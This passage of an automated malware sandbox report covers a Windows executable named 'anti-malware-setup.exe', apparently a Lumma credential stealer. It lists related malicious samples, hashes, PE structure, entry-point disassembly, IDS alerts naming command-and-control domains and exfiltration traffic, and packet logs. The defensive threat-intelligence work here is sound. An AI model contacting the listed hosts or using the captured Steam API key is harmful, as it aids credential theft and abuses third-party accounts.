104.102.49.254 | r4xiHKy8aM.exe | malicious | Socks5Systemz | /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254 | http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | www.valvesoftware.com/legal.htm
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: sputnik-1985.com
  appFile.exe | malicious | LummaC Stealer | 104.21.80.1
  [UPD]Intel_Unit.2.1.exe | malicious | LummaC | 104.21.64.1
  Installer.exe | malicious | LummaC, PureLog Stealer | 104.21.96.1
  Setup.exe | malicious | LummaC | 104.21.80.1
  BnJxmraqlk.exe | malicious | LummaC, PrivateLoader | 104.21.48.1
  file.exe | malicious | Amadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog Stealer | 104.21.96.1
  NjFiIQNSid.exe | malicious | LummaC | 104.21.112.1
Match: steamcommunity.com
  appFile.exe | malicious | LummaC Stealer | 104.102.49.254
  cache_registerer.exe | malicious | LummaC Stealer | 104.102.49.254
  Invoice.exe | malicious | LummaC | 104.102.49.254
  NvOxePa.exe | malicious | LummaC | 104.102.49.254
  h3VYJaQqI9.exe | malicious | LummaC Stealer | 104.102.49.254
  P2V7Mr3DUF.exe | malicious | LummaC | 104.102.49.254
  v3tb7mqP48.exe | malicious | LummaC | 104.102.49.254
  asd.exe | malicious | LummaC | 104.102.49.254
  [UPD]Intel_Unit.2.1.exe | malicious | LummaC | 104.102.49.254
  socolo.exe | malicious | LummaC | 104.102.49.254
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: CLOUDFLARENETUS
  https://we.tl/t-fnebgmrnYQ | malicious | Unknown | 104.26.0.90
  appFile.exe | malicious | LummaC Stealer | 104.21.80.1
  Undelivered Messages.htm | malicious | Unknown | 104.21.84.200
  driver.exe | malicious | Blank Grabber | 162.159.137.232
  XClient.exe | malicious | XWorm | 104.20.4.235
  http://www.efnhdh.blogspot.mk/ | malicious | GRQ Scam | 172.67.12.83
  gem1.exe | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
  http://pdfdrive.com.co | malicious | Unknown | 104.21.11.245
  RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 104.21.80.1
  https://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29t | malicious | Unknown | 172.66.43.95
Match: AKAMAI-ASUS
  appFile.exe | malicious | LummaC Stealer | 104.102.49.254
  cache_registerer.exe | malicious | LummaC Stealer | 104.102.49.254
  armv5l.elf | malicious | Unknown | 23.209.153.127
  http://postman.com/ | malicious | Unknown | 104.102.43.106
  https://sanctionssearch.ofac.treas.gov | malicious | Unknown | 23.49.251.37
  Fantazy.ppc.elf | malicious | Unknown | 104.81.98.224
  Fantazy.x86.elf | malicious | Unknown | 184.28.181.149
  6.elf | malicious | Unknown | 2.16.79.96
  Invoice.exe | malicious | LummaC | 104.102.49.254
  Fantazy.i486.elf | malicious | Unknown | 104.73.204.147
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: a0e9f5d64349fb13191bc781f81f42e1
  appFile.exe | malicious | LummaC Stealer | 104.21.48.1, 104.102.49.254
  cache_registerer.exe | malicious | LummaC Stealer | 104.21.48.1, 104.102.49.254
  CY SEC AUDIT PLAN 2025.docx.doc | malicious | Unknown | 104.21.48.1, 104.102.49.254
  PO#3_RKG367.bat | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 104.21.48.1, 104.102.49.254
  Invoice.exe | malicious | LummaC | 104.21.48.1, 104.102.49.254
  24EPV9vjc5.exe | malicious | Unknown | 104.21.48.1, 104.102.49.254
  kXzODlqJak.exe | malicious | Unknown | 104.21.48.1, 104.102.49.254
  24EPV9vjc5.exe | malicious | Unknown | 104.21.48.1, 104.102.49.254
  kXzODlqJak.exe | malicious | Unknown | 104.21.48.1, 104.102.49.254
  cLm7ThwEvh.msi | malicious | Unknown | 104.21.48.1, 104.102.49.254

No context

No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.329736355393688
TrID:
• Win32 Executable (generic) a (10002005/4) 99.53%
• InstallShield setup (43055/19) 0.43%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: anti-malware-setup.exe
File size: 4'063'744 bytes
MD5: fedb69af5de74d46366ad0570e77d9ac
SHA1: a85c8c91780e9366fafc2aba2d13e5b3a49c37ba
SHA256: 61316bc78fb84aaa2d5fd1e10aec9a8cf96ab5ac7ee1436048eb7fd199045310
SHA512: 1aa337e9aaaaa51651398fb5996356241c818bc6851139769577eb91d332d868edc0b6a53d029efe72f0b74f83551fb3f826d016170c3418b9a8fbfbe668caed
SSDEEP: 49152:Qx0uAJAxX0YdindluiIoFcr/sy/sdHEVjUaw7QNwZ/cKP93:XuA6nUCoFwwg4/cKF
TLSH: 2C161741FACB84F5D9031830515B623B97325E058B28DB9BFA1C7F5AEB7B6924C33249
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........Z=.........................0.........:...@...........................@.....).>...@................................
Icon Hash: 0e13696d692f0f0c
Entrypoint: 0x461830
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 1
                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                            File Version Minor:1
                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                            Subsystem Version Minor:1
                                                                                                                                                                                                            Import Hash:1aae8bf580c846f39c71c05898e57e88
Instruction
jmp 00007F4D188B4D70h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov dword ptr [esp], eax
mov dword ptr [esp+04h], ecx
call 00007F4D18895BD6h
mov eax, dword ptr [esp+08h]
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
sub esp, 08h
mov ecx, dword ptr [esp+0Ch]
mov edx, dword ptr [ecx]
mov eax, esp
mov dword ptr [edx+04h], eax
sub eax, 00010000h
mov dword ptr [edx], eax
add eax, 000013A0h
mov dword ptr [edx+08h], eax
mov dword ptr [edx+0Ch], eax
lea edi, dword ptr [ecx+34h]
mov dword ptr [edx+18h], ecx
mov dword ptr [edi], edx
mov dword ptr [esp+04h], edi
call 00007F4D188B71D4h
cld
call 00007F4D188B625Eh
call 00007F4D188B4E99h
add esp, 08h
ret
jmp 00007F4D188B7080h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ebx, dword ptr [esp+04h]
mov ebp, esp
mov dword ptr fs:[00000034h], 00000000h
mov ecx, dword ptr [ebx+04h]
cmp ecx, 00000000h
je 00007F4D188B7081h
mov eax, ecx
shl eax, 02h
sub esp, eax
mov edi, esp
mov esi, dword ptr [ebx+08h]
cld
rep movsd
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3e9000 | 0x44c | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x400000 | 0xa5dc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3ea000 | 0x14e80 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3ad2e0 | 0xb4 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1cc918 | 0x1cca00 | de7919e62c57418dbfd09999ffb8ab32 | False | 0.4105156037991859 | data | 6.046129796006456 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x1ce000 | 0x1de794 | 0x1de800 | 7ead1eaaa1a7c1de7ff49f5121c20d16 | False | 0.48508318638975967 | data | 5.977428201341314 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3ad000 | 0x3b900 | 0x14e00 | 74c2e046786ffbea65358fe81a52647b | False | 0.46813014595808383 | data | 5.004101632891957 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x3e9000 | 0x44c | 0x600 | d5b1e111c6227f21350bf56fac3ad0ae | False | 0.359375 | OpenPGP Public Key | 3.876341617407367 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x3ea000 | 0x14e80 | 0x15000 | af44cc9ea4a77f0206e8e5757b869a74 | False | 0.5860770089285714 | data | 6.592979947748528 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab | 0x3ff000 | 0x4 | 0x200 | 07b5472d347d42780469fb2654b7fc54 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x400000 | 0xa5dc | 0xa600 | 6558ffbc3772c7a56bf2d0ef24c9158c | False | 0.4422769201807229 | data | 5.698282689540848 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4002c4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.7437943262411347
RT_ICON | 0x40072c | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 0 | English | United States | 0.7930232558139535
RT_ICON | 0x400de4 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.5868852459016394
RT_ICON | 0x40176c | 0xb20 | Device independent bitmap graphic, 26 x 52 x 32, image size 0 | English | United States | 0.7124297752808989
RT_ICON | 0x40228c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.5173545966228893
RT_ICON | 0x403334 | 0x1348 | Device independent bitmap graphic, 34 x 68 x 32, image size 0 | English | United States | 0.5790113452188006
RT_ICON | 0x40467c | 0x1588 | Device independent bitmap graphic, 36 x 72 x 32, image size 0 | English | United States | 0.2260522496371553
RT_ICON | 0x405c04 | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 0 | English | United States | 0.38772189349112424
RT_ICON | 0x40766c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.37935684647302903
RT_GROUP_ICON | 0x409c14 | 0x84 | data | English | United States | 0.7045454545454546
RT_VERSION | 0x409c98 | 0x318 | data | | | 0.45580808080808083
RT_MANIFEST | 0x409fb0 | 0x62c | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4240506329113924
DLL | Import
kernel32.dll | WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler
| Language of compilation system | Country where language is spoken | Map |
| --- | --- | --- |
| English | United States | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2025-01-10T11:34:27.592980+0100 | 2058608 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enterwahsh .biz) | 1 | 192.168.2.5 | 49919 | 1.1.1.1 | 53 | UDP |
| 2025-01-10T11:34:27.613414+0100 | 2058514 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) | 1 | 192.168.2.5 | 51023 | 1.1.1.1 | 53 | UDP |
| 2025-01-10T11:34:27.623847+0100 | 2058502 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) | 1 | 192.168.2.5 | 63976 | 1.1.1.1 | 53 | UDP |
| 2025-01-10T11:34:27.636200+0100 | 2058492 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) | 1 | 192.168.2.5 | 65283 | 1.1.1.1 | 53 | UDP |
| 2025-01-10T11:34:27.646656+0100 | 2058500 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) | 1 | 192.168.2.5 | 57991 | 1.1.1.1 | 53 | UDP |
| 2025-01-10T11:34:27.658561+0100 | 2058510 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) | 1 | 192.168.2.5 | 57035 | 1.1.1.1 | 53 | UDP |
| 2025-01-10T11:34:27.673815+0100 | 2058484 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) | 1 | 192.168.2.5 | 58483 | 1.1.1.1 | 53 | UDP |
| 2025-01-10T11:34:27.684905+0100 | 2058512 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) | 1 | 192.168.2.5 | 50267 | 1.1.1.1 | 53 | UDP |
| 2025-01-10T11:34:27.695225+0100 | 2058480 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) | 1 | 192.168.2.5 | 55149 | 1.1.1.1 | 53 | UDP |
| 2025-01-10T11:34:28.390611+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49770 | 104.102.49.254 | 443 | TCP |
| 2025-01-10T11:34:28.908331+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.5 | 49770 | 104.102.49.254 | 443 | TCP |
| 2025-01-10T11:34:29.481329+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49780 | 104.21.48.1 | 443 | TCP |
| 2025-01-10T11:34:29.915029+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49780 | 104.21.48.1 | 443 | TCP |
| 2025-01-10T11:34:29.915029+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49780 | 104.21.48.1 | 443 | TCP |
| 2025-01-10T11:34:30.467471+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49787 | 104.21.48.1 | 443 | TCP |
| 2025-01-10T11:34:30.952361+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49787 | 104.21.48.1 | 443 | TCP |
| 2025-01-10T11:34:30.952361+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49787 | 104.21.48.1 | 443 | TCP |
| 2025-01-10T11:34:31.736399+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49796 | 104.21.48.1 | 443 | TCP |
| 2025-01-10T11:34:33.191826+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49805 | 104.21.48.1 | 443 | TCP |
| 2025-01-10T11:34:34.476499+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 61984 | 104.21.48.1 | 443 | TCP |
| 2025-01-10T11:34:35.105358+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 61984 | 104.21.48.1 | 443 | TCP |
| 2025-01-10T11:34:37.015416+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 62001 | 104.21.48.1 | 443 | TCP |
| 2025-01-10T11:34:39.107891+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 62017 | 104.21.48.1 | 443 | TCP |
| 2025-01-10T11:34:40.315230+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 62024 | 104.21.48.1 | 443 | TCP |
| 2025-01-10T11:34:40.780403+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 62024 | 104.21.48.1 | 443 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- |
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.957160950 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.957201958 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:30.957210064 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.011881113 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.039042950 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.039167881 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.039257050 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.039503098 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.039503098 CET49787443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.039520025 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.039530039 CET44349787104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.268440008 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.268471956 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.268645048 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.268877983 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.268893957 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.736331940 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.736398935 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.737647057 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.737654924 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.737900019 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.740864038 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.740995884 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:31.741024017 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.270318985 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.270461082 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.270642042 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.270873070 CET49796443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.270889997 CET44349796104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.732028961 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.732065916 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.732144117 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.732526064 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:32.732539892 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.191675901 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.191826105 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.193406105 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.193435907 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.194076061 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.195302010 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.195415974 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.195453882 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.195516109 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.195530891 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.601208925 CET6198253192.168.2.5162.159.36.2
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.606096983 CET5361982162.159.36.2192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.610688925 CET6198253192.168.2.5162.159.36.2
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.615534067 CET5361982162.159.36.2192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.741085052 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.741200924 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.741362095 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.741421938 CET49805443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:33.741441011 CET44349805104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.006797075 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.006846905 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.006930113 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.007266998 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.007283926 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.079252005 CET6198253192.168.2.5162.159.36.2
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.084379911 CET5361982162.159.36.2192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.084445000 CET6198253192.168.2.5162.159.36.2
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.476430893 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.476499081 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.477688074 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.477695942 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.478041887 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.479207039 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.479367971 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.479397058 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.479458094 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:34.479468107 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:35.105427980 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:35.105547905 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:35.105609894 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:35.245300055 CET61984443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:35.245318890 CET44361984104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:36.558376074 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:36.558410883 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:36.558501005 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:36.558903933 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:36.558919907 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.015221119 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.015415907 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.022039890 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.022059917 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.022336006 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.023618937 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.023746967 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:37.023751974 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.517438889 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.517534018 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.517591953 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.517688036 CET62001443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.517705917 CET44362001104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.652731895 CET62017443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.652765036 CET44362017104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.652843952 CET62017443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.653167963 CET62017443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:38.653184891 CET44362017104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.107798100 CET44362017104.21.48.1192.168.2.5
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.107891083 CET62017443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.109462023 CET62017443192.168.2.5104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:34:39.109472036 CET44362017104.21.48.1192.168.2.5
Jan 10, 2025 11:34:39.109739065 CET | 443 | 62017 | 104.21.48.1 | 192.168.2.5
Jan 10, 2025 11:34:39.113020897 CET | 62017 | 443 | 192.168.2.5 | 104.21.48.1
